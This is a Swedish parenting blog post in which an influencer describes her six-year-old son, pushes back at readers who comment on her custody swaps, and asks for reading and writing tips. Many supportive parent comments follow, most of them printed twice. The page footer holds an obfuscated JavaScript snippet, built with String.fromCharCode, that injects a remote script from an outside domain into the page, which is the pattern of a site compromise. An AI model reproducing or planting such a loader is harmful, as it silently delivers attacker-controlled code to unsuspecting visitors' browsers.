Nu behöver jag alla föräldrars tips! Tack på förhand….

bild-3636

 

Godkväll!

Imorgon är det dags. Då flyger Lilleman upp till mig och Jonas. SOM jag längtat!!!

-Alltså fiiiiii f*n vad jag längtar!

 Lilleman har varit hos sin pappa i 1.5 vecka.

Alltså jag skrattar HÖGT när vissa blogg-läsar-poliser kommenterar DIREKT när man inte byter på ”normal” tid. och som DIREKT börjat diskutera kring hur länga jag ska ha Ludvig nästa gång. vart vi ska vara och vad vi ska göra.

-Dra mig baklänges så sjukt!!!!?

När jag tänker på det så är det lite läskigt faktiskt.. Bara för att man är en influenser och då en offentlig person så är det precis som om vissa får för sig att dom har full rätt att veta vad jag, min familj och min x-familj i DETALJ har för planering och upplägg.

-SKÄRPNING! I detta fallet så handöar det helt enkelt bara om att Ludvig ska kunna följa med sin pappas familj utomland. (på min vecka) och dessutom vara hemma hos mig på deras vecka. Ja, då byter och trixar vi så att det ska fungera. Så att alla som kan får sol semester, och samtidigt få det att gå så jämt upp som möjligt utan att någon drabbas eller att det blir för hattigt. Uppe på det så är vi båda föräldrar till Lilleman egna företagare, med fullspäckade scheman på lite olika vis. Min skola, två städer, syskon, katter… ja gud vet allt! Så för att förekomma fortsatt diskussion, vi kommer INTE att byta exakt samma dag, samma tid och med samma upplägg. Det fungerar inte så i våran familj.

-Nog om det! 

bild-3623 bild-3670

Min lilla kille är nyfiken, social och utåtriktad. Han är busig, med glimten i ögat. Han gråter sällan, knappt om han faller, och slår sig. Han gråter däremot om han gör någon annan illa, av misstag. Då skäms han som en hund. Även om det var av misstag i en lek som dattan eller kull. Han är snäll och omtänksam. Han har mycket kompisar. Han skrattar och är för det mesta glad. Han är extremt dålig förlorare (Precis som jag… och hans pappa) Han är väldigt kreativ och bygger lego i samma klass som för 13-15 åringar. Det är hans ”grej”. Att flyga ensam mellan Sthlm/Öland har gjort att han vuxit med ansvar. Han är trygg i sig själv och har en extremt stor socialkompetens. 

Lilleman är nu 6 år. Han fyller 7 år i början av januari. Mycket händer i hans utveckling just nu.

Han har nu börjat komma in i förskoleklass och tycker att skolan är roligt. Speciellt rast och fritids (Fniss…) Han är lite osäker på sig själv, har börjat tvivla smått på sig själv i olika kunskap. Tex läsing och att skriva. Han kan säga ”det går inte” utan att knappt föröka….

Han behöver uppmuntran för att tro på sig själv. Detta gäller inte i alla situationer, men ändå så att jag reflekterat över det. Jag försöker att uppmuntra det som han gör bra, jag förökar att puscha honom framåt. Vi övar läsning och skrift varje vardag kväll när vi läser saga. Det är väl långt ifrån alla 6 åringar som kan skriva och läsa när dom börjar förskoleklass?

-Eller?????

Berätta gärna…

Har du några egna erfarenheter? Några bra tips på roliga läs/skriv övningar som man kan få in i vardagen?

-Tack på förhand!

Kram

/ My Martens

46 Komentarer

 1. Läste något tänkvärt för lite sen (minns inte var) där andemeningen var:
  Dina barn lär sig att läsa, räkna och skriva i skolan. Det behöver de inte kunna innan men empati, att vara bra kompis och vanligt ”hyfs” är föräldrarnas uppgift att lära barnen och då gärna långt innan förskolan.

 2. Långt ifrån alla som kan läsa och skriva i förskoleklass! Det är ju det de ska lära sig de första åren i skolan så kan man det redan innan blir det ju lätt tråkigt eller hur? Det beror ju på hur intresserad barnet är också? Tycker inte att man som förälder måste puscha barnet till att läsa och skriva mer än nödvändigt,det sätter bara onödig press på dem. Låt dem lära sig i sin egen takt. Om Lilleman känner sig ”dålig” så trösta honom i det att han inte måste stressa fram något. De ska gå i skolan i många år och tycker de att skolan är tråkig, sressig redan första åren så blir det ju inte bra?

 3. Herregud det är defenitivt långt ifrån alla förskoleklassare som kan läsa. För dom allra flesta lossnar det nån gång i 1:an. Vill han inte så låt det va, det kommer. Vill han öva så finns det bra lätta korsords böcker för barn som mina barn uppskattat, ord memori ( hur stavas det) ordspel men som sagt bara om han vill. Läsning skall vara kul å inget jobbigt å ett måste.
  Som du säger själv han e en social kille och han ligger långt fram där, alla är bra på olika saker å allt kommer tids nog!
  Kram på er

 4. Min son har lätt för sig i skolan o låg långt fram även under dagistiden. Jag o hans pappa valde medvetet att inte lära honom läsa innan förskoleklass, vi ville inte att han redan skulle kunna det ifall han skulle känna att skolan inte skulle ’bli kul’ om han redan kunde det dem ska lära ut. Så nej, han kunde absolut inte läsa när han började förskoleklass. Skriva alfabetet kunde han, mest de stora bokstäverna även om han hade full koll även på gemenerna. Däremot skriva ord själv, nää det skulle jag nog inte säga att han kunde då heller.
  De kommer få lära sig läsa o skriva när ettan börjar så ta det med ro! Och att tvivla på sin förmåga hör sexåringar till, det är en utvecklingsfas!

 5. Han behöver inte kunna läsa i förskoleklass – det gör man i ettan ?
  Läs för honom istället, färglägg/rita bokstäver eller nåt sånt och om han vill öva så gör det, annars låt det vara just nu. Han hinner!

 6. Jag får ofta kommentarer om att jag och mina barns pappa också har konstiga rutiner, men båda har jobb/träning/plugg som gör att barnen är där det passar bäst helt enkelt. Vi bor nära varandra så barnen går själva mellan oss och har egna nycklar till båda. Funkar toppen bra för oss.
  I förskoleklass brukar det nog mest fokuseras på att prata om bokstäver och om sitt eget namn. Läs och skrivkunskaper kommer ju först i skolan.
  Om barnen vill öva på bokstäver på ett lek och lustfyllt sätt kan man ju rita av olika loggor… typ LEGO, ICA, IKEA och vad det nu kan vara som finns i deras närmiljö och de kan relatera till.
  På nätet finns det läs-med-sagor på ur.skola. Där läser en berättarröst sagan med rörliga bilder samtidigt som texten finns med hela tiden.

 7. Den där typen av kommentarer syns ofta tycker jag. Förstår inte behovet av att gräva efter misslyckanden och att försöka odugligförklara andra. Hur orkar man med. Jag hade nog skrattat jag med. Roligt r du skriver rapporterat och klart. ?
  Kramis

 8. Då du reagerat på att han själv säger att det inte går att läsa så kan du fundera på om han har ärvt din dyslexi. Det är ofta ärftligt och om du pratar med skolan så kan han redan nu få extra stöd. Min dotter har dyslexi och jag fick hela tiden höra att hon bara skulle knäcka läskoden. Efter byte av skola fick hon hjälp i trean, men då var hennes självförtroende redan dåligt för hon kände sig dum. Lita på din magkänsla!

  • Nja… inte just bara läsning… har är lite sån, med allt som är nytt han inte är bäst på ? Men det är på tok för Tidigt att veta gällande dyslexi. Men självklart något jag kommer vara observant på ☺️

   • Där har Du faktiskt fel!!…
    Idag med rätt pedagoger inom omsorgen och BVC personal som kan sin sak…”fångar” vi idag upp barn redan från 5-års ålder….vilket gör stor skillnad för deras utveckling!!!

   • Du känner honom bäst och ska lita på din magkänsla. Jag tänkte också på dyslexi eftersom mina två tjejer båda har det. De var helt olika när det gällde läsning. Den stora var totalt ointresserad och tyckte det var jobbigt men jag tjatade mig till en utredning tidigt för jag förstod att något var tokigt redan i första klass. Första utredningen gjorde vi efter andra klass. Den lilla var väldigt nyfiken och ville börja träna innan förskoleklassen men hon lyckades aldrig få till flytet trots år av slit. Det dröjde till slutet på trean innan hon fick sin diagnos. De har blivit hjälpta av att få sin diagnos för då slutade de tycka att de var dumma i huvudet som inte fick till det. De älskar båda böcker även om det är jag och mannen som läser för dem.
    Kanske lego-böcker och Lego-tidningar kan vara ett tips? Det är ju alltid lättare att läsa något man är intresserad av.

 9. Läste något tänkvärt för lite sen (minns inte var) där andemeningen var:
  Dina barn lär sig att läsa, räkna och skriva i skolan. Det behöver de inte kunna innan men empati, att vara bra kompis och vanligt ”hyfs” är föräldrarnas uppgift att lära barnen och då gärna långt innan förskolan.

 10. Långt ifrån alla som kan läsa och skriva i förskoleklass! Det är ju det de ska lära sig de första åren i skolan så kan man det redan innan blir det ju lätt tråkigt eller hur? Det beror ju på hur intresserad barnet är också? Tycker inte att man som förälder måste puscha barnet till att läsa och skriva mer än nödvändigt,det sätter bara onödig press på dem. Låt dem lära sig i sin egen takt. Om Lilleman känner sig ”dålig” så trösta honom i det att han inte måste stressa fram något. De ska gå i skolan i många år och tycker de att skolan är tråkig, sressig redan första åren så blir det ju inte bra?

 11. Min har alltid älskat siffror och kunde lösa mattetal innan förskoleklass. Hon sög åt sig kunskap om matematik som en svamp. Läsning och alfabetet däremot tyckte hon var dötråkigt och totalt onödigt så där har vi kämpat hårt tills tredje klass då matteboken plötsligt började innehålla mattetal i textform. Halleleuja äntligen blev hon motiverad att lära sig läsa!
  Har inga bra uppslag att ge men låt tiden ha din gång så kommer det ?

 12. Herregud det är defenitivt långt ifrån alla förskoleklassare som kan läsa. För dom allra flesta lossnar det nån gång i 1:an. Vill han inte så låt det va, det kommer. Vill han öva så finns det bra lätta korsords böcker för barn som mina barn uppskattat, ord memori ( hur stavas det) ordspel men som sagt bara om han vill. Läsning skall vara kul å inget jobbigt å ett måste.
  Som du säger själv han e en social kille och han ligger långt fram där, alla är bra på olika saker å allt kommer tids nog!
  Kram på er

 13. Min son har lätt för sig i skolan o låg långt fram även under dagistiden. Jag o hans pappa valde medvetet att inte lära honom läsa innan förskoleklass, vi ville inte att han redan skulle kunna det ifall han skulle känna att skolan inte skulle ’bli kul’ om han redan kunde det dem ska lära ut. Så nej, han kunde absolut inte läsa när han började förskoleklass. Skriva alfabetet kunde han, mest de stora bokstäverna även om han hade full koll även på gemenerna. Däremot skriva ord själv, nää det skulle jag nog inte säga att han kunde då heller.

  De kommer få lära sig läsa o skriva när ettan börjar så ta det med ro! Och att tvivla på sin förmåga hör sexåringar till, det är en utvecklingsfas!

 14. Han behöver inte kunna läsa i förskoleklass – det gör man i ettan 🙂
  Läs för honom istället, färglägg/rita bokstäver eller nåt sånt och om han vill öva så gör det, annars låt det vara just nu. Han hinner!

 15. Jag får ofta kommentarer om att jag och mina barns pappa också har konstiga rutiner, men båda har jobb/träning/plugg som gör att barnen är där det passar bäst helt enkelt. Vi bor nära varandra så barnen går själva mellan oss och har egna nycklar till båda. Funkar toppen bra för oss.

  I förskoleklass brukar det nog mest fokuseras på att prata om bokstäver och om sitt eget namn. Läs och skrivkunskaper kommer ju först i skolan.

  Om barnen vill öva på bokstäver på ett lek och lustfyllt sätt kan man ju rita av olika loggor… typ LEGO, ICA, IKEA och vad det nu kan vara som finns i deras närmiljö och de kan relatera till.

  På nätet finns det läs-med-sagor på ur.skola. Där läser en berättarröst sagan med rörliga bilder samtidigt som texten finns med hela tiden.

 16. Den där typen av kommentarer syns ofta tycker jag. Förstår inte behovet av att gräva efter misslyckanden och att försöka odugligförklara andra. Hur orkar man med. Jag hade nog skrattat jag med. Roligt r du skriver rapporterat och klart. 😁
  Kramis

 17. Då du reagerat på att han själv säger att det inte går att läsa så kan du fundera på om han har ärvt din dyslexi. Det är ofta ärftligt och om du pratar med skolan så kan han redan nu få extra stöd. Min dotter har dyslexi och jag fick hela tiden höra att hon bara skulle knäcka läskoden. Efter byte av skola fick hon hjälp i trean, men då var hennes självförtroende redan dåligt för hon kände sig dum. Lita på din magkänsla!

  • Nja… inte just bara läsning… har är lite sån, med allt som är nytt han inte är bäst på 😃 Men det är på tok för Tidigt att veta gällande dyslexi. Men självklart något jag kommer vara observant på ☺️

   • Där har Du faktiskt fel!!…
    Idag med rätt pedagoger inom omsorgen och BVC personal som kan sin sak…”fångar” vi idag upp barn redan från 5-års ålder….vilket gör stor skillnad för deras utveckling!!!

   • Du känner honom bäst och ska lita på din magkänsla. Jag tänkte också på dyslexi eftersom mina två tjejer båda har det. De var helt olika när det gällde läsning. Den stora var totalt ointresserad och tyckte det var jobbigt men jag tjatade mig till en utredning tidigt för jag förstod att något var tokigt redan i första klass. Första utredningen gjorde vi efter andra klass. Den lilla var väldigt nyfiken och ville börja träna innan förskoleklassen men hon lyckades aldrig få till flytet trots år av slit. Det dröjde till slutet på trean innan hon fick sin diagnos. De har blivit hjälpta av att få sin diagnos för då slutade de tycka att de var dumma i huvudet som inte fick till det. De älskar båda böcker även om det är jag och mannen som läser för dem.
    Kanske lego-böcker och Lego-tidningar kan vara ett tips? Det är ju alltid lättare att läsa något man är intresserad av.

 18. Min har alltid älskat siffror och kunde lösa mattetal innan förskoleklass. Hon sög åt sig kunskap om matematik som en svamp. Läsning och alfabetet däremot tyckte hon var dötråkigt och totalt onödigt så där har vi kämpat hårt tills tredje klass då matteboken plötsligt började innehålla mattetal i textform. Halleleuja äntligen blev hon motiverad att lära sig läsa!

  Har inga bra uppslag att ge men låt tiden ha din gång så kommer det 🙂

 19. Ludvig verkar vara som min dotter, hon bara ville inte lära sig det som hon inte kunde lära sig själv. Som läsning. Hon gick på en jättebra skola så ingen gjorde någon affär av det, när hon knäckt koden så var med igen. Hon var sådan, envis som synden redan som liten.. Vi trodde att hon hade dyslexi men när msn kom in i bilden och hon såg hur andra skrev så lättade det. På högstadiet sa en lärare en gång då jag var där på ”kvartsamtal” att Ja det kommer nog inte bli någon direkt akademiker av **** I somras då hon var här så mötte hon den läraren och läraren frågade dottern vad hon arbetade med? Nä jag arbetar inte nu för jag läser på högskolan till lärare ? DET var hennes revansch och hon säger det att HUR fasen kan en lärare säga en sån sak? Hon lärde sig läsa i slutet av första klass, sonen som är några år yngre kunde läsa då han började i förskolan. Han blev däremot skoltrött så han fixade gymnasiet hyffsat och jobbar nu. Så det är så olika. Jag tror det kommer då han ser att de får läxor och att andra läser. Som någon skrev här före så.. han har med sig det han behöver hemifrån, skolan vet hur barn ska lära sig läsa, skriva mm.

 20. Ludvig verkar vara som min dotter, hon bara ville inte lära sig det som hon inte kunde lära sig själv. Som läsning. Hon gick på en jättebra skola så ingen gjorde någon affär av det, när hon knäckt koden så var med igen. Hon var sådan, envis som synden redan som liten.. Vi trodde att hon hade dyslexi men när msn kom in i bilden och hon såg hur andra skrev så lättade det. På högstadiet sa en lärare en gång då jag var där på ”kvartsamtal” att Ja det kommer nog inte bli någon direkt akademiker av **** I somras då hon var här så mötte hon den läraren och läraren frågade dottern vad hon arbetade med? Nä jag arbetar inte nu för jag läser på högskolan till lärare 😉 DET var hennes revansch och hon säger det att HUR fasen kan en lärare säga en sån sak? Hon lärde sig läsa i slutet av första klass, sonen som är några år yngre kunde läsa då han började i förskolan. Han blev däremot skoltrött så han fixade gymnasiet hyffsat och jobbar nu. Så det är så olika. Jag tror det kommer då han ser att de får läxor och att andra läser. Som någon skrev här före så.. han har med sig det han behöver hemifrån, skolan vet hur barn ska lära sig läsa, skriva mm.

 21. Det löser sig med tiden. Det är nog väldigt olika hur läs- och skrivkunskaperna ser ut vid skolstart. Mitt ena barn lärde sig läsa när hon var fyra och mitt andra barn blev intresserad precis innan skolstart, men utvecklades mer under det första och andra året i just det än första barnet.
  Fina egenskaper han har, verkligen. ❤️

 22. God morgon My ? Tycker att du är grym, fortsatt att vara precis som du är. Ni troll som tycker annorlunda kan väl bara strunta i Mys blogg. Då bestämmer vi det, ni drar vidare till en blogg som passar er bättre ?. Som Täbybo hoppas jag att du stortrivs här i denna fina kommun! Ha en riktigt härlig vecka med Lilleman. Om vädret tillåter så rekommenderar jag er ett besök på Rönninge By under helgen. Våfflorna med hjortronsylt rekommenderas varmt ?. Kram kram ?

 23. När man själv var liten var förskoleklass mer lek och lära, än bara lärande? Så jag är uppväxt med att man INTE ska kunna läsa och skriva när man börjar. Dock om barnet är intresserad så är det väl toppen att fortsätta på den linjen? Men ett litet tips som min dotters fröken sa ” Du kanske inte kan detta …ÄN” och jämförde i bild för barnen tex när de skulle lära sig cykla, då går föräldern jämte och höll i tills man övat tillräckligt mycket och kunde själv:-) Likaså visar en studie att barn som får beröm för sitt jobb dvs om barnet gjort något så säger man ofta vad duktig du är istället för vilket fint jobb du gjort:-) Detta tycker jag har hjäpt hemma när det funnits perioder då barnet gett upp innan man försökt ? Lycka till ?

 24. Det löser sig med tiden. Det är nog väldigt olika hur läs- och skrivkunskaperna ser ut vid skolstart. Mitt ena barn lärde sig läsa när hon var fyra och mitt andra barn blev intresserad precis innan skolstart, men utvecklades mer under det första och andra året i just det än första barnet.
  Fina egenskaper han har, verkligen. ❤️

 25. Barn utvecklas väldigt olika och det är som några redan har skrivit att många kan inte läsa och skriva när de börjar förskoleklass. Barn fokuserar på olika saker. En del är duktiga motoriskt, andra språkmässigt (läs talar rent). Men det är få som har problem när de blir lite äldre. Jag tror du gör helt rätt att göra det hela roligt för Ludwig. Kram och ha en mysig helg tillsammans.

 26. God morgon My 💕 Tycker att du är grym, fortsatt att vara precis som du är. Ni troll som tycker annorlunda kan väl bara strunta i Mys blogg. Då bestämmer vi det, ni drar vidare till en blogg som passar er bättre 👍. Som Täbybo hoppas jag att du stortrivs här i denna fina kommun! Ha en riktigt härlig vecka med Lilleman. Om vädret tillåter så rekommenderar jag er ett besök på Rönninge By under helgen. Våfflorna med hjortronsylt rekommenderas varmt 😊. Kram kram 💞

 27. När man själv var liten var förskoleklass mer lek och lära, än bara lärande? Så jag är uppväxt med att man INTE ska kunna läsa och skriva när man börjar. Dock om barnet är intresserad så är det väl toppen att fortsätta på den linjen? Men ett litet tips som min dotters fröken sa ” Du kanske inte kan detta …ÄN” och jämförde i bild för barnen tex när de skulle lära sig cykla, då går föräldern jämte och höll i tills man övat tillräckligt mycket och kunde själv:-) Likaså visar en studie att barn som får beröm för sitt jobb dvs om barnet gjort något så säger man ofta vad duktig du är istället för vilket fint jobb du gjort:-) Detta tycker jag har hjäpt hemma när det funnits perioder då barnet gett upp innan man försökt 🙂 Lycka till 🙂

 28. Nä, man måste verkligen inte kunna läsa när man går i nollan. Och jag tror nog ofta att pojkar är lite senare än flickor. Min erfarenhet med 2 killar och en tjej.
  Tänk vad många år dem ska gå i skolan. Kram

 29. Din lille son har så många styrkor! Han verkar vara social, med stor empatisk förmåga. Det är viktiga egenskaper! När det gäller läsning är det viktigt att han tycker det är kul och intressant. Därför är det viktigast att du läser för honom. Idag finns det så många spännande och intressanta böcker. På det sättet väcker du hans läsintresse. Han går ”bara” i förskoleklass och då behöver man inte alls kunna läsa. Försök att avdramatisera detta. Det finns också många roliga, bra och nyttiga appar att ladda ner på iPad där man leker med orden och tränar på både läsning och skrivning. Hör med personalen på skolan.

 30. Barn utvecklas väldigt olika och det är som några redan har skrivit att många kan inte läsa och skriva när de börjar förskoleklass. Barn fokuserar på olika saker. En del är duktiga motoriskt, andra språkmässigt (läs talar rent). Men det är få som har problem när de blir lite äldre. Jag tror du gör helt rätt att göra det hela roligt för Ludwig. Kram och ha en mysig helg tillsammans.

 31. Nä, man måste verkligen inte kunna läsa när man går i nollan. Och jag tror nog ofta att pojkar är lite senare än flickor. Min erfarenhet med 2 killar och en tjej.
  Tänk vad många år dem ska gå i skolan. Kram

 32. Din lille son har så många styrkor! Han verkar vara social, med stor empatisk förmåga. Det är viktiga egenskaper! När det gäller läsning är det viktigt att han tycker det är kul och intressant. Därför är det viktigast att du läser för honom. Idag finns det så många spännande och intressanta böcker. På det sättet väcker du hans läsintresse. Han går ”bara” i förskoleklass och då behöver man inte alls kunna läsa. Försök att avdramatisera detta. Det finns också många roliga, bra och nyttiga appar att ladda ner på iPad där man leker med orden och tränar på både läsning och skrivning. Hör med personalen på skolan.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/